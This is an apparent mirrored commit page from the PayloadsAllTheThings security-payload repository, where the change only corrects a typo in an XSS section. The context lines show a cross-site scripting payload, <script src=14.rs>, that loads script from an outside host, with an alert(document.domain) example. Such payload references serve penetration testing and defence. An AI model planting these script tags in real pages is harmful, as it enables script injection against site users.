mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-01-09 17:44:42 +01:00
Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings
This commit is contained in:
commit
dcc5ebd3b6
1 changed files with 1 additions and 1 deletions
|
|
@ -92,7 +92,7 @@ XSS for HTML5
|
|||
XSS using script tag (external payload)
|
||||
```javascript
|
||||
<script src=14.rs>
|
||||
you can alsoo specify an arbitratry payload with 14.rs/#payload
|
||||
you can also specify an arbitratry payload with 14.rs/#payload
|
||||
e.g: 14.rs/#alert(document.domain)
|
||||
```
|
||||
|
||||
|
|
|
|||
Loading…
Reference in a new issue